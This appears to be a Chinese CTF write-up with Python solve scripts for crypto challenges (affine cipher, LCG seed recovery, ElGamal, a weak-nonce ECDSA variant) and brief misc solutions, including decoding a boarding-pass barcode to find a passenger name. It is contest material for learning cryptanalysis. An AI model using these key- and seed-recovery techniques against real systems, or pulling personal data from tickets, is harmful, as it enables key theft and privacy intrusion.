绿城杯的密码签到题,魔改的仿射。
```python=
import gmpy2
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
enc= ''#密文
flag=''
a,b,c=37,23,52
for i in enc:
if i in str1:
ind=str1.find(i)
m=((ind-b)*gmpy2.invert(a,c))%c
flag+=str1[m]
else:
flag+=i
print(flag)
```
### lcg
参考这个博客,可以直接出https://blog.csdn.net/superprintf/article/details/108964563
```python
from Crypto.Util.number import *
def gcd(a,b):
if(b==0):
return a
else:
return gcd(b,a%b)
s = [64053834035066785058511795263859088093402576718387054930069870694827422995248363210875296865931156540418540088656840163752864867889701529, 62747878069691338351001678737533032651009187924993079609551517187402239263500990458468121965725468864035542647616568888614971291913860683, 8610389166165547798963079074461089122942923569827711232062490735297527674581120584017030806864406444034839689358368567214353599295961192, 67368398051089407366868405625671942347378755129423872678285919732014302509367453094142041707571135936337763803644340301362544880144675515, 3140546334522640626644397935274312967014650101920766829848908314358452633165879115222769049730993718556007257838431843662986174886332684, 86570894867827558107244361752089586436766881136739525172025909326268148819720261812567282066327259810017581923500053674785415315313293458, 74270633946662538117925791534180331044438757906314082041974053142483165604719102121031974214138125154407150853174565679126633465007917723, 82222345180880564316408536364709779418528442531150999715627704885024880160675971236916036110841803202987616501846568355385621016171784903, 79833541796675422937999973936505826001046326324194169378072775519666431460490483847928549009565561011528302879850550395115321828798479473, 70276250399219459795079058514491950109021040664671993784167534811426903455184545174600178849521746939676479421177456528336980088529680364]
t = []
for i in range(9):
t.append(s[i]-s[i-1])
all_n = []
for i in range(7):
all_n.append(gcd((t[i+1]*t[i-1]-t[i]*t[i]), (t[i+2]*t[i]-t[i+1]*t[i+1])))
MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] #逆元计算
for n in all_n:
n=abs(n)
if n==1:
continue
print (n)
a=(s[2]-s[1])*MMI((s[1]-s[0]),n)%n
a_phi=MMI(a,n)
b=(s[1]-a*s[0])%n
seed = (a_phi*(s[0]-b))%n
print(long_to_bytes(seed))
```
### ElGamal
```python
import gmpy2
from libnum import *
g=2156
h=19364538528204968684702462061708976286196990984716223584085879982705646870069549303950939491629843375744443683509974903099180054959020059938548094928837585111057000303537904740493039606490649300278524100909497612375482645091133840008548424390812995957714079622701882313111238420594917948494969125949668945158548567720310535536897936888399774638950146810221642554493233791471360830335537206304149954921774311047853146084012237704564511942668835567863826393453948857017040646601008642223803582573943030891986715595055019324440801777935710172212979280887633359930943038503968027220655973786600562745845324497196488322807831
A=9995630293450443710926439589612896118286566349495827427313438676168463826116464955957074433529028056439123823805308552189562100224561582223340587241549648666015052286406499398662123425284889357996851916521752203901065203149577226993716682772240169667052935024258753871207295938393987115234900806806087469563879862789823974291794802885292895213421601726484494744585379945552505857608540799287322743476575453278214456474079134885967525955182921923390325162821977199745281205980366366121378035910599474885845467715899470571914517089671524145865515025521343377461693651620965558755177493712395218314031923968372262075180
B=19641501134902015385307004774559226297607904139535093991544778570325559816795122240929672966548430213002444213049237352884044793521811769547993865673285536027032480604621677716937881383473923009344119402643156187210725950448943245328946864032062370241469698117655959560919664615808572393768427179442187467030444796570161893138409985609498627476592440545737482637905930451978398776355436712097494242442565588522867934815296797704571702165109019346547812996256980418437536915183977770034247964771335417318800617277414315830475829847165491728666543824190225718431772550287257838893533761142681106488302856660213072339680
p=22462079869412176627931821885555952101944600797405594918854641749463937220864393745055830608055446812244264996698900999697665284937332732196426926630725227832097762570319772606025030783192201516034684801965773843056157955430791744014113857105510823445498218456593034533803396102478411584767531641441019490499843217916423047209971411135368955482819998224367982436547751038717372349803304840532049220062772016877891231064593677968672514003518354643489863858311269669893073147595991452524138366552663628111568762990736278921809825308594547202597167338050312287182471648075189640944982066563515747342673687096427486818972323
q=28577709757521853216198246673735308017741222388556736537983004770310352698300755400834390086584537929063950377479517811320184840887191771242273443550541002330913183931704545300286298706351401419891456491050602853761015210471745221392002362729657536190201295746301570653693888171092126698177521172316818690203362872667204894669174823327441419189338420132783692667363550939843985177866800051567492646390295186867546095502027580112814903312364318884847155036019427060932663037653933145705010644469037694798433540700682288704592653064369652929512935544593272630003144590426449924866389397663506039876175174422935733866377
c1=11332286863127405812094504635471613854814937800124860910727374889102766142166022490278538952075193339453759020528778269864384569875318135661332253758107737756918318534675081922056254701103801041560591485925003447157410375099257642817840146427635984078459775376609366508041281759152628202088485025645919922723952547611605566905496365693787020294985478159474030995131023017342810653667997385147659211512460252853307639792749415598629996493681533855438162174190745672038233810051871572769436201835882757496071853682754083012061501462824377212969857559498262545545910958726045037239560044244415222143743768606933059075697021
c2=1372282964332292854673500643835800757935806829460870485690391794902235711423490316005967872250129637294226354772488937508471990099713257512193293101115267735884980056095830011299721555157834626858611366012895262798146439754243097833792294579486439977908090543253784149475851789481952116226404573468174537238610218304779943433942800306671530413679374917876133865272894626882479919363711304836310550110548690619783301429872523537762660931047187386025166135883629423496176981342027467183199837522102565931413172569551605898211400707349332005272073786142995248095725863673208717402182238792111207189694429541309766220120229
c1_=7487492223501562207493141071238187010012683445431218865414855332767540287102428308132128561296707313339788591514321855414633993013212032014459200554829455238385612822475050524716563150861899110475980044752986663504368072899898047552556690686147010639666093686804838659502492460286686233915296337369816076763293591399063166665197193039627759442636660347406076545502410067401681811168844856371856963623975767540063383560470436217362992479808296945205199416087282056433190263324978331977428500978843951453699326810909568668333877992835809219093321026449785933372463937202136772746118027345246453586564853335765972544419734
c2_=6112901046404372403304708508669386492965625978668114719881280901365259881398849837356351281946750580906017030014709113808809450653169088939063675485865090639521811018655956687997373608027777185293782782804573818464618173001147063495321506979299553768270075924588394108603182983000620919544195093565180407742782557942731554038528736279686907266601446021443130620983244101165429091236355740482290982339112999228102147699542277380459486768987627950851284608417149418679274351711137770428381855005158720083477148759018003909146756483092352214900488334939460818625168850759696360708636616959341042406572145675249300094599316
tmp = gmpy2.powmod(c2, A, p) * gmpy2.powmod(h, B, p) * gmpy2.invert(c2_, p)
tmp = tmp % p
gg, x, y = gmpy2.gcdext(A - 1, p - 1)
m = gmpy2.powmod(tmp, x, p)
print(n2s(m))
```
### Dear Alice
谷歌CTF原题,搜索关键词能搜到
github项目上有解题脚本
```python=
import os
import hashlib
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
#flag = open('flag.txt').read()
INF = (1, 1, 0)
d = 311315114987715623444276142623839583360207853110657101019745009424926710590583360123029204556690633449715530612380512577293882572730509350735778781050933
mod = 8948962207650232551656602815159153422162609644098354511344597187200057010413552439917934304191956942765446530386427345937963894309923928536070534607816947
a = 6294860557973063227666421306476379324074715770622746227136910445450301914281276098027990968407983962691151853678563877834221834027439718238065725844264138
b = 3245789008328967059274849584342077916531909009637501918328323668736179176583263496463525128488282611559800773506973771797764811498834995234341530862286627
n = 8948962207650232551656602815159153422162609644098354511344597187200057010413418528378981730643524959857451398370029280583094215613882043973354392115544169
G = (5139617820728399941653175323358137352238277428061991823713659546881441331696699723004749024403291797641521696406798421624364096550661311227399430098134141,
1798860115416690485862271986832828064808333512613833729548071279524320966991708554765227095605106785724406691559310536469721469398449016850588110200884962,
5042518522433577951395875294780962682755843408950010956510838422057522452845550974098236475624683438351211176927595173916071040272153903968536756498306512)
def Double(p):
x, y, z = p
if z == 0 or y == 0:
return INF
ysqr = y * y % mod
zsqr = z * z % mod
s = 4 * x * ysqr % mod
m = (3 * x * x + a * zsqr * zsqr) % mod
x2 = (m * m - 2 * s) % mod
y2 = (m * (s - x2) - 8 * ysqr * ysqr) % mod
z2 = 2 * y * z % mod
return x2, y2, z2
def Add(p, q):
if p[2] == 0:
return q
if q[2] == 0:
return p
x1, y1, z1 = p
x2, y2, z2 = q
z1sqr = z1 * z1 % mod
z2sqr = z2 * z2 % mod
u1 = x1 * z2sqr % mod
u2 = x2 * z1sqr % mod
s1 = y1 * z2 * z2sqr % mod
s2 = y2 * z1 * z1sqr % mod
if u1 == u2:
if s1 != s2:
return INF
else:
return Double(p)
h = u2 - u1 % mod
hsqr = h * h % mod
hcube = hsqr * h % mod
r = s2 - s1 % mod
t = u1 * hsqr % mod
x3 = (r * r - hcube - 2 * t) % mod
y3 = (r * (t - x3) - s1 * hcube) % mod
z3 = h * z1 * z2 % mod
return x3, y3, z3
def Multiply(p, x):
if p == INF:
return p
res = INF
while x:
x, r = divmod(x, 2)
if r:
res = Add(res, p)
p = Double(p)
return res
def Transform(m, l):
z = m
shift = l - n.bit_length()
if shift > 0:
z >>= shift
return z
def RNG(nbits, a, b):
nbytes = nbits // 8
B = os.urandom(nbytes)
return a * sum([B[i] * b ** i for i in range(len(B))]) % 2**nbits
def Sign(msg, d):
h = hashlib.sha512(msg)
z = Transform(int.from_bytes(h.digest(), 'big'), h.digest_size*8)
print('d = ', d)
print('z = ', z)
k = RNG(n.bit_length(), 16843009, 4294967296)
print('k = ', k)
x1, y1, z1 = Multiply(G, k)
r = (x1 * pow(z1, -2, mod) % mod) % n
s = pow(k, -1, n) * (z + r * d) % n
print('r = ', r)
print('s = ', s)
print('left = ', pow(k, -1, n) % n)
print('right = ', (z + r * d) % n)
assert int(s) == pow(k, -1, n) * (z + r * d) % n
return r, s
def Verify(msg, Q, r, s):
h = hashlib.sha512(msg)
z = Transform(int.from_bytes(h.digest(), 'big'), h.digest_size*8)
u1 = z*pow(s, -1, n) % n
u2 = r*pow(s, -1, n) % n
x1, y1, z1 = Add(Multiply(G, u1), Multiply(Q, u2))
return r == (x1 * pow(z1, -2, mod) % mod) % n
def Encrypt(plaintext, x):
key = hashlib.sha256(str(x).encode()).digest()
aes = algorithms.AES(key)
encryptor = Cipher(aes, modes.ECB(), default_backend()).encryptor()
padder = padding.PKCS7(aes.block_size).padder()
padded_data = padder.update(plaintext) + padder.finalize()
ciphertext = encryptor.update(padded_data) + encryptor.finalize()
return ciphertext
def Decrypt(ciphertext, x):
key = hashlib.sha256(str(x).encode()).digest()
aes = algorithms.AES(key)
decryptor = Cipher(aes, modes.ECB(), default_backend()).decryptor()
unpadder = padding.PKCS7(aes.block_size).unpadder()
decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
plaintext = unpadder.update(decrypted_data) + unpadder.finalize()
return plaintext
_, _, ca = (8832295267397231051293216564016639537146222596144354850230682204978731311879255662259663270183445827348338041752369314181111940713714991119349376636404112, 8683784208731634307361157916911868656279723101808163939313971801256736484458199874570532609285522391139002296248059424750941962344918156540408403221858292, 105398535464409171419472607677747462033030589690350997911381059472020486557672504778060748058626707326992258591478040500759349352824508941100030623708235493999018571171774658661651532338275358740821547158517615704187173346885098836066743736788259192831313414309775979590033581301910426314601982482556670097620)
ka = [
0x8a6e81a10c229af504772b51c502638820811034faa62b8dafa019210347918419b71d0638c89b59026b7611edc6a14b2c1c1fb1092a352adfffb7e114f4f385,
0x3f837315a1fb46097f5eb680697901d75758b859846d37cad33d3f464efb84ace1e85fc60f4e445a031b5ca0e4965e0b081bd4a6e8efea1d3ba07aad51a70cd
]
ca = ca.to_bytes(byteorder='big',length=(ca.bit_length() + 7) // 8)
for k in ka:
try:
recv_msg = Decrypt(ca, k)
print(recv_msg)
except:
pass
```
## 5、Misc
### 签到
base32解码
### LSB?
zsteg -a xxx.png
cumtctf{LSB_is_s0_e@sy_Right?}
### 加密?
跳舞的小人解出密码:SHERLOCK
打开后看到一个空白的txt文件,查看内码,零宽解出:JKGASwqeeh!@$
得到这个:63756D746374667B69745F69735F63727970746F3F7D
base16解密:cumtctf{it_is_crypto?}
### 社工?
真的离谱,WANG/JIA中间的斜杠还要保留
去这里扫一下机票上的二维码:[https://demo.dynamsoft.com/barcode-reader/](https://demo.dynamsoft.com/barcode-reader/)
得到信息:
然后去搜一下飞机票二维码的数据信息
M1就是旅客姓名
flag : cumtctf{WANG/JIA}
Google Drive
Gist
Clipboard
Sign in with Wallet
